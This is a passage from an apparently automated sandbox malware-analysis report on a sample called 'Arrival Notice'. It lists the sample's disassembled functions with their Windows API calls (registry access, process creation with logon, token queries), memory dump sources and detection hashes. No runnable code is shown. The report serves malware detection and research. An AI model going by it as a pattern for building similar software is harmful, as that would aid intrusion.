                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003E644F,00000001,00000001,8BE85006,?,?,?), ref: 003E62DE
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003E63D8
                  • __freea.LIBCMT ref: 003E63E5
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • __freea.LIBCMT ref: 003E63EE
                  • __freea.LIBCMT ref: 003E6413
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 0a6ac154af366e8a51c1c26c3db437131fcc3af85fbd2d6c366b8ea6f23d4579
                  • Instruction ID: 1f683cbff0792da66a772b090590c7b045685109aef0cce66db13ff8be4f4284
                  • Opcode Fuzzy Hash: 0a6ac154af366e8a51c1c26c3db437131fcc3af85fbd2d6c366b8ea6f23d4579
                  • Instruction Fuzzy Hash: C551D3726002A6ABDB278F66CC82EAF77A9EB54790F164729FD05DB1D0DB34DC40C660
                  Function 0043BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043BCCA
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043BD25
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043BD6A
                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0043BD99
                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0043BDF3
                  • RegCloseKey.ADVAPI32(?), ref: 0043BDFF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                  • String ID:
                  • API String ID: 1120388591-0
                  • Opcode ID: 32ec6b9a5e873b6852547a20962361c460723af4e5c1d9eb990b2db79c9a3321
                  • Instruction ID: db41fb734c65e215cc2e3d01d29441395809fd2957763982cb6726dbf63ccb04
                  • Opcode Fuzzy Hash: 32ec6b9a5e873b6852547a20962361c460723af4e5c1d9eb990b2db79c9a3321
                  • Instruction Fuzzy Hash: FD81A030208241AFC715DF24C881F6ABBE5FF88308F14955EF6598B2A2CB35ED05CB92
                  Function 0040F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(00000035), ref: 0040F7B9
                  • SysAllocString.OLEAUT32(00000001), ref: 0040F860
                  • VariantCopy.OLEAUT32(0040FA64,00000000), ref: 0040F889
                  • VariantClear.OLEAUT32(0040FA64), ref: 0040F8AD
                  • VariantCopy.OLEAUT32(0040FA64,00000000), ref: 0040F8B1
                  • VariantClear.OLEAUT32(?), ref: 0040F8BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearCopy$AllocInitString
                  • String ID:
                  • API String ID: 3859894641-0
                  • Opcode ID: e4329b1b7e68f21005c78770044becb64442ff68135f05375b539ace295d3cef
                  • Instruction ID: bba5bf2ef0627d2a6bb88bef52e4f1c1c891f90662f82e7fbbf1bc60ccdc7bc8
                  • Opcode Fuzzy Hash: e4329b1b7e68f21005c78770044becb64442ff68135f05375b539ace295d3cef
                  • Instruction Fuzzy Hash: 77510575600300AACF30AB65D885B69B3A4EF45314B24847BE902EF6D1DB7C8C44CBAB
                  Function 0042910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • GetOpenFileNameW.COMDLG32(00000058), ref: 004294E5
                  • _wcslen.LIBCMT ref: 00429506
                  • _wcslen.LIBCMT ref: 0042952D
                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00429585
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$FileName$OpenSave
                  • String ID: X
                  • API String ID: 83654149-3081909835
                  • Opcode ID: 7a50a0d6970da13b70685ed0743154839506e6149f490ecd95f3583735c5e862
                  • Instruction ID: 75f19505e472d40cabd414c340769ba12f2188fb15cdc6c1075aef61bbf1ccd0
                  • Opcode Fuzzy Hash: 7a50a0d6970da13b70685ed0743154839506e6149f490ecd95f3583735c5e862
                  • Instruction Fuzzy Hash: 48E1D1316083109FD725DF24D881BAAB7E0BF85314F04896EF9899B3A2DB34DD45CB96
                  Function 003C920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • BeginPaint.USER32(?,?,?), ref: 003C9241
                  • GetWindowRect.USER32(?,?), ref: 003C92A5
                  • ScreenToClient.USER32(?,?), ref: 003C92C2
                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C92D3
                  • EndPaint.USER32(?,?,?,?,?), ref: 003C9321
                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004071EA
                    • Part of subcall function 003C9339: BeginPath.GDI32(00000000), ref: 003C9357
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                  • String ID:
                  • API String ID: 3050599898-0
                  • Opcode ID: aab5eeadcce07135792794d3e45833d1e63253d6bb49047e535ce7db07a3c501
                  • Instruction ID: 7cd3a7cd62f9888d3002ba88eb4d9c37cde7649eee2351f17456051357031f26
                  • Opcode Fuzzy Hash: aab5eeadcce07135792794d3e45833d1e63253d6bb49047e535ce7db07a3c501
                  • Instruction Fuzzy Hash: 5541AF74105200AFD711DF24CC88FAA7BA8EB4A320F050A6EF994DB2F1C7359C46DB66
                  Function 004207EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                  Download Yara Rule
                  APIs
                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0042080C
                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00420847
                  • EnterCriticalSection.KERNEL32(?), ref: 00420863
                  • LeaveCriticalSection.KERNEL32(?), ref: 004208DC
                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004208F3
                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00420921
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                  • String ID:
                  • API String ID: 3368777196-0
                  • Opcode ID: 1447b1c808ce38506d13a80185833b7c00782cf40376509e1337440bbb98afd1
                  • Instruction ID: 5d48aaa98dc576b386f46e989fff82f65629fd9f8455eaad18136539bffb5d7e
                  • Opcode Fuzzy Hash: 1447b1c808ce38506d13a80185833b7c00782cf40376509e1337440bbb98afd1
                  • Instruction Fuzzy Hash: 5D415871A00205EFDF15AF64EC85A6AB7B9FF04300F1440A9E9049E297DB74DE64DBA8
                  Function 004481DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0040F3AB,00000000,?,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0044824C
                  • EnableWindow.USER32(00000000,00000000), ref: 00448272
                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004482D1
                  • ShowWindow.USER32(00000000,00000004), ref: 004482E5
                  • EnableWindow.USER32(00000000,00000001), ref: 0044830B
                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0044832F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Show$Enable$MessageSend
                  • String ID:
                  • API String ID: 642888154-0
                  • Opcode ID: e103869ae5b2967ea1ee8b3b2f2363f15b07ec1694072914ec15c2c3c771d942
                  • Instruction ID: ef82a6dad947ae3f042d415408c2562ba2d74a5c6fddc57da9bac76281ff4ecd
                  • Opcode Fuzzy Hash: e103869ae5b2967ea1ee8b3b2f2363f15b07ec1694072914ec15c2c3c771d942
                  • Instruction Fuzzy Hash: EF41B434601644AFEB11CF15C899BED7BE0BB0A715F1842BEE9084B372CB76AC41CB58
                  Function 00414C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                  Download Yara Rule
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00414C95
                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00414CB2
                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00414CEA
                  • _wcslen.LIBCMT ref: 00414D08
                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00414D10
                  • _wcsstr.LIBVCRUNTIME ref: 00414D1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                  • String ID:
                  • API String ID: 72514467-0
                  • Opcode ID: b931143ebaa3fe052bfd62db0d68ccc4581ebb6b80e95bbc46493fd5cfc4023b
                  • Instruction ID: 258abbb8d62fceb5306e0035c5865d3824b515e462c754bfe1b621653a289881
                  • Opcode Fuzzy Hash: b931143ebaa3fe052bfd62db0d68ccc4581ebb6b80e95bbc46493fd5cfc4023b
                  • Instruction Fuzzy Hash: 1C2129762052007BEB165B35FC49EBB7B9CDF85750F15803EF805CE292EA65CC4193A4
                  Function 0042581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                  • _wcslen.LIBCMT ref: 0042587B
                  • CoInitialize.OLE32(00000000), ref: 00425995
                  • CoCreateInstance.OLE32(0044FCF8,00000000,00000001,0044FB68,?), ref: 004259AE
                  • CoUninitialize.OLE32 ref: 004259CC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 3172280962-24824748
                  • Opcode ID: 314d176672378a50018f7c7ac359a8becc91ba90be8e7e31dcf8cc655ac9600f
                  • Instruction ID: dc236cd8a14a4db04f98b2d69bc246ab6a6be530edbcf1a1540983fd85fdf73b
                  • Opcode Fuzzy Hash: 314d176672378a50018f7c7ac359a8becc91ba90be8e7e31dcf8cc655ac9600f
                  • Instruction Fuzzy Hash: 7ED172B06087109FC714DF24D480A6ABBE1FF89714F54885EF88A9B361DB35EC45CB96
                  Function 0041175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00410FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00410FCA
                    • Part of subcall function 00410FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00410FD6
                    • Part of subcall function 00410FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00410FE5
                    • Part of subcall function 00410FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00410FEC
                    • Part of subcall function 00410FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00411002
                  • GetLengthSid.ADVAPI32(?,00000000,00411335), ref: 004117AE
                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004117BA
                  • HeapAlloc.KERNEL32(00000000), ref: 004117C1
                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 004117DA
                  • GetProcessHeap.KERNEL32(00000000,00000000,00411335), ref: 004117EE
                  • HeapFree.KERNEL32(00000000), ref: 004117F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                  • String ID:
                  • API String ID: 3008561057-0
                  • Opcode ID: 36754bf45ee7de923491c7c43c24ff12ea6689ca261c338dd9468b6722deb9cd
                  • Instruction ID: 00667f35a4879e32f84b5dbc5695e94efed15819ff4861cc4144d9e04f1f3e78
                  • Opcode Fuzzy Hash: 36754bf45ee7de923491c7c43c24ff12ea6689ca261c338dd9468b6722deb9cd
                  • Instruction Fuzzy Hash: 4511BE35602205FFDB109FA4CC89BEFBBA9EB42355F14402AF55197360C739A980CB68
                  Function 004114CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004114FF
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00411506
                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00411515
                  • CloseHandle.KERNEL32(00000004), ref: 00411520
                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041154F
                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00411563
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                  • String ID:
                  • API String ID: 1413079979-0
                  • Opcode ID: 0fa1aef873e549065c72457379e1a1eb5bd97b01e1fbf942396f049fd9a1a888
                  • Instruction ID: 308e2d14b26533bac57790a3e73961308a84fab9dc0a22ea2f94f313ff7f3f89
                  • Opcode Fuzzy Hash: 0fa1aef873e549065c72457379e1a1eb5bd97b01e1fbf942396f049fd9a1a888
                  • Instruction Fuzzy Hash: F8115C76601209ABDF118F94DD89BDE7BA9EF49744F084025FA05A2160C3798E60DB65
                  Function 003D3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,003D3379,003D2FE5), ref: 003D3390
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003D339E
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003D33B7
                  • SetLastError.KERNEL32(00000000,?,003D3379,003D2FE5), ref: 003D3409
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: e028138152832bcdd91a16d79ead21783699975d4ef22484a705dec24b16ae31
                  • Instruction ID: 8906cdbf2f5bb5fd0d8190c89f263b46c7cf4702898287ad2d9f2de1bb8af483
                  • Opcode Fuzzy Hash: e028138152832bcdd91a16d79ead21783699975d4ef22484a705dec24b16ae31
                  • Instruction Fuzzy Hash: 35012437209311BEA7272BB57EC55672A98EB05379320023FF410893F0EF218D11918A
                  Function 003E2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,003E5686,003F3CD6,?,00000000,?,003E5B6A,?,?,?,?,?,003DE6D1,?,00478A48), ref: 003E2D78
                  • _free.LIBCMT ref: 003E2DAB
                  • _free.LIBCMT ref: 003E2DD3
                  • SetLastError.KERNEL32(00000000,?,?,?,?,003DE6D1,?,00478A48,00000010,003B4F4A,?,?,00000000,003F3CD6), ref: 003E2DE0
                  • SetLastError.KERNEL32(00000000,?,?,?,?,003DE6D1,?,00478A48,00000010,003B4F4A,?,?,00000000,003F3CD6), ref: 003E2DEC
                  • _abort.LIBCMT ref: 003E2DF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: db8b0041bc9d64194a2d23964e411773eec86bc1b6a846e3114830d3d4ef84e0
                  • Instruction ID: 75bedf7d623f8e823d146bd6071e2f5938c6d4eddba49ff68de432843b2f49a7
                  • Opcode Fuzzy Hash: db8b0041bc9d64194a2d23964e411773eec86bc1b6a846e3114830d3d4ef84e0
                  • Instruction Fuzzy Hash: 42F0F4369456B067C253273BAC0AA1B265DABC27A0F364729FA34D61D2EF3488014160
                  Function 00448A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96A2
                    • Part of subcall function 003C9639: BeginPath.GDI32(?), ref: 003C96B9
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96E2
                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00448A4E
                  • LineTo.GDI32(?,00000003,00000000), ref: 00448A62
                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00448A70
                  • LineTo.GDI32(?,00000000,00000003), ref: 00448A80
                  • EndPath.GDI32(?), ref: 00448A90
                  • StrokePath.GDI32(?), ref: 00448AA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                  • String ID:
                  • API String ID: 43455801-0
                  • Opcode ID: c977dcee244a151e759a8a04300503c9d4020d068c9947439f662901a3a8ca4e
                  • Instruction ID: 99d770fefd0bef648a33b8b3159be6a58e4f6f08db6d11da737e9b5fb54dc31c
                  • Opcode Fuzzy Hash: c977dcee244a151e759a8a04300503c9d4020d068c9947439f662901a3a8ca4e
                  • Instruction Fuzzy Hash: D1110576001108FFEB129F90DC88EAA7F6CEB09350F048026FA199A1A1C7719D55DFA4
                  Function 004151FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00415218
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00415229
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415230
                  • ReleaseDC.USER32(00000000,00000000), ref: 00415238
                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041524F
                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00415261
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
